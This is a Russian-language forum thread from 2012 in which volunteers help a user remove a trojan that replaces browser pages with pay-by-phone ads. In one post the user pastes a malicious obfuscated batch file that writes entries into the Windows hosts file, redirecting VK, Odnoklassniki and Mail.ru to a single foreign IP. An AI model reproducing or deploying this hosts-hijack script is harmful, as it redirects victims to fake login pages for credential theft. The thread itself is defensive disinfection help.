Вернуться   Компьютерный форум > Компьютеры > Программы > Безопасность
 
 
Опции темы
Старый 17.10.2012, 13:20   #1
Новичок
 
Регистрация: 23.01.2012
Сообщений: 39
Репутация: 0
По умолчанию появился вирус. помогите вылечить

Зацепил вчера вирус. он тут же сам установился и при обращении в браузере подменяются страницы и выдается сообщения рекламные где предлагается отправить деньги на телефон
eset удалить не может он пишет

17.10.2012 11:55:59 Модуль сканирования файлов, исполняемых при запуске системы файл Оперативная память = D:\Documents and Settings\Дима и Аня\Application Data\Microsoft\taskhost.exe модифицированный Win32/SpyVoltar.A троянская программа очистка невозможна HOME-B6ACE71D45\Дима и Аня

создал логи uvs и avz, но выложить не могу, т.к. подменяет браузео страницы при пользовании сайтами и адрес размещения логов я не вижу после отправки в файлообменники
ilij4 вне форума  
Старый 17.10.2012, 13:23   #2
Эксперт
 
Аватар для KaAd
 
Регистрация: 28.09.2010
Сообщений: 18,283
Записей в блоге: 6
Репутация: 1712
По умолчанию

Цитата:
Сообщение от ilij4 Посмотреть сообщение
создал логи uvs и avz, но выложить не могу, т.к. подменяет браузео страницы при пользовании сайтами и адрес размещения логов я не вижу после отправки в файлообменники
ну перекиньте логи на флешку/диск и залейте с другого устройства!
KaAd вне форума  
Старый 17.10.2012, 13:32   #3
Эксперт
 
Регистрация: 12.07.2011
Сообщений: 28,970
Репутация: 1660
По умолчанию

пробуйте из безопасного режима системы safe mode (с поддержкой сети) выложить логи
safety вне форума  
Старый 17.10.2012, 13:40   #4
Новичок
 
Регистрация: 23.01.2012
Сообщений: 39
Репутация: 0
По умолчанию

лог uvz отправил с др компа
http://zalil.ru/upload/33861553

---------- Добавлено в 12:38 ---------- Предыдущее сообщение было написано в 12:38 ----------

http://zalil.ru/33861566
лог avz

---------- Добавлено в 12:40 ---------- Предыдущее сообщение было написано в 12:38 ----------

http://zalil.ru/33861568
лог за 3 месяца проги rsit
ilij4 вне форума  
Старый 17.10.2012, 13:47   #5
Эксперт
 
Регистрация: 12.07.2011
Сообщений: 28,970
Репутация: 1660
По умолчанию

выполните в uVS скрипт из файла
файл скрипта скачайте отсюда
http://rghost.ru/private/40985962/fa...9821d4a3f37851
после перезагрузки системы,
далее,
выполните быстрое сканирование в Malwarebytes
safety вне форума  
Старый 17.10.2012, 13:52   #6
Эксперт
 
Регистрация: 25.05.2011
Сообщений: 9,136
Репутация: 811
По умолчанию

ilij4, что за файл:
Код:
D:\PROGRAM FILES\DD2\DD1\VIDISH.BAT
имеете представление?
Vvvyg вне форума  
Старый 17.10.2012, 13:57   #7
Новичок
 
Регистрация: 23.01.2012
Сообщений: 39
Репутация: 0
По умолчанию

про файл нет представления
ilij4 вне форума  
Старый 17.10.2012, 14:00   #8
Эксперт
 
Регистрация: 25.05.2011
Сообщений: 9,136
Репутация: 811
По умолчанию

Тогда правой кнопкой мыши по нему, "Изменить" и покажите здесь его содержимое с тэгом "Код" (решётка на панели вверху окна ввода сообщения.
Vvvyg вне форума  
Ads
Старый 17.10.2012, 14:33   #9
Новичок
 
Регистрация: 23.01.2012
Сообщений: 39
Репутация: 0
По умолчанию

SET POPOLOJO11111111111=%fffff%.
SET POPOLOJO3=%POPOLOJO1%ver
SET POPOLOJO2=%POPOLOJO2%%POPOLOJO4%%POPOLOJO5%
SET POPOLOJO2=%POPOLOJO2%%POPOLOJO4%%POPOLOJO5%
SET POPOLOJO2=%POPOLOJO2%%POPOLOJO4%%POPOLOJO5%
SET POPOLOJO5=os%ggbergerg%ts
SET POPOLOJO11111111111=%fffff%.
SET POPOLOJO3=%POPOLOJO1%ver
SET POPOLOJO2=%POPOLOJO2%%POPOLOJO4%%POPOLOJO5%
SET POPOLOJO2=%POPOLOJO2%%POPOLOJO4%%POPOLOJO5%
SET POPOLOJO2=%POPOLOJO2%%POPOLOJO4%%POPOLOJO5%
SET POPOLOJO5=os%ggbergerg%ts
SET POPOLOJO11111111111=%fffff%.
SET POPOLOJO3=%POPOLOJO1%ver
SET POPOLOJO2=%POPOLOJO2%%POPOLOJO4%%POPOLOJO5%
SET POPOLOJO2=%POPOLOJO2%%POPOLOJO4%%POPOLOJO5%
SET POPOLOJO2=%POPOLOJO2%%POPOLOJO4%%POPOLOJO5%
SET POPOLOJO5=os%ggbergerg%ts
SET POPOLOJO2=\%sefe4gk%S%dnr4grg45grg%ystem32\dri
SET POPOLOJO2=%systemroot%%POPOLOJO2%%ggbdergerggg%%PO POLOJO3%
SET POPOLOJO2=\%sefe4gk%S%dnr4grg45grg%ystem32\dri
SET POPOLOJO3=%POPOLOJO1%ver
SET POPOLOJO4=s\et%Abergergm%c\h
SET POPOLOJO2=%systemroot%%POPOLOJO2%%ggbdergerggg%%PO POLOJO3%
SET POPOLOJO2=%POPOLOJO2%%POPOLOJO4%%POPOLOJO5%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
echo 98y9879799 >> %POPOLOJOOLO%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 my%dfsdfsdf%.mail%dfsdfsdf%.ru >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 m%dfsdfsdf%.my%dfsdfsdf%.mail%dfsdfsdf%.ru >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 vk%dfsdfsdf%.com >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 m%dfsdfsdf%.vk%dfsdfsdf%.com >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 odnoklassniki%dfsdfsdf%.ru >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 www%dfsdfsdf%.odnoklassniki%dfsdfsdf%.ru >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 m%dfsdfsdf%.odnoklassniki%dfsdfsdf%.ru >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 ok%dfsdfsdf%.ru >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 m%dfsdfsdf%.ok%dfsdfsdf%.ru >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 vk%dfsdfsdf%.com >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%
#--ffff---э

echo 94%dfsdfsdf%.242%dfsdfsdf%.221%dfsdfsdf%.203 www%dfsdfsdf%.odnoklassniki%dfsdfsdf%.ru >> %POPOLOJOOLO%
SET POPOLOJOOLO=%DbdfgdfgnmG%%POPOLOJO2%

---------- Добавлено в 13:32 ---------- Предыдущее сообщение было написано в 13:31 ----------

Скрипт помог, малваребайт ничего не нашел. Комп вроде работает нормально. Спасибо за помощь огромное

---------- Добавлено в 13:33 ---------- Предыдущее сообщение было написано в 13:32 ----------

выше выложил содержимое файла D:\PROGRAM FILES\DD2\DD1\VIDISH.BAT
про решетку не совсем понял
ilij4 вне форума  
Старый 17.10.2012, 14:37   #10
Эксперт
 
Регистрация: 12.07.2011
Сообщений: 28,970
Репутация: 1660
По умолчанию

что с проблемой? выполнен скрипт в uVS? выполнено сканирование в малваребайт?
safety вне форума  
Старый 17.10.2012, 14:39   #11
Эксперт
 
Регистрация: 25.05.2011
Сообщений: 9,136
Репутация: 811
По умолчанию

Цитата:
Сообщение от ilij4 Посмотреть сообщение
выше выложил содержимое файла D:\PROGRAM FILES\DD2\DD1\VIDISH.BAT
Удаляйте этот файл, и если в папке DD2 ничего Вашего нет, её тоже со всем содержимым.
Vvvyg вне форума  
Старый 17.10.2012, 14:40   #12
Новичок
 
Регистрация: 23.01.2012
Сообщений: 39
Репутация: 0
По умолчанию

Safety спасибо вам, проблема исчезла, скрипт выполнил, малваребайт не нашел ничего
ilij4 вне форума  
Старый 17.10.2012, 14:44   #13
Эксперт
 
Регистрация: 12.07.2011
Сообщений: 28,970
Репутация: 1660
По умолчанию

хорошо,
Выполните скрипт в AVZ при наличии доступа в интернет:
--------
Код:
begin
if FileExists(GetAVZDirectory + 'log\avz_log.txt') Then DeleteFile(GetAVZDirectory  + 'log\avz_log.txt');
 If DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', GetAVZDirectory +'ScanVuln.txt') Then ExecuteScript('ScanVuln.txt')
 Else ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
 if FileExists(GetAVZDirectory + 'log\avz_log.txt') Then ExecuteFile('notepad.exe', GetAVZDirectory + 'log\avz_log.txt', 1, 0, false)
 else MessageDlg('Часто используемые уязвимости не обнаружены.', mtInformation, mbOk, 0);
end.
---------
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player.
safety вне форума  
Ads
 


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите вылечить вирус btn87 Безопасность 1 30.06.2012 15:34
Помогите вылечить вирус fufa8888 Безопасность 8 19.02.2012 22:22
Помогите вылечить вирус A-L-E-X Безопасность 11 12.12.2011 00:31
На сервере появился x30811 и Winlogos.exe. Помогите вылечить VikNab Безопасность 3 02.11.2011 00:32
Помогите вылечить вирус Zumer Безопасность 1 28.08.2011 16:59


Текущее время: 00:45. Часовой пояс GMT +4. Powered by vBulletin® Version 5.8.9
Copyright ©2000 - 2016, Jelsoft Enterprises Ltd.